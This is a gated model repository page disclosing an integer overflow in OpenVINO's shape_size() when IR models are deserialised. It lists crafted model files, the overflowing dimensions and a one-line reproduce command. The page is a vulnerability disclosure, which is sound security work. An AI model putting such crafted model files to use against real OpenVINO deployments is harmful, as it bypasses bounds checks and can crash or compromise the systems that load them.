You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

OpenVINO shape_size() Integer Overflow PoC

Files

overflow_shape.xml — OpenVINO IR model with dimensions that overflow in shape_size()
overflow_shape.bin — Minimal weights file

Root Cause

xml_deserialize_util.cpp:916 uses unsafe ov::shape_size(shape) despite shape_size_safe() existing. Dimensions 2147483647 × 2147483647 × 2 × 1 overflow size_t, bypassing bounds check.

Reproduce

pip install openvino
python3 -c "from openvino.runtime import Core; core = Core(); core.read_model('overflow_shape.xml', 'overflow_shape.bin')"

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support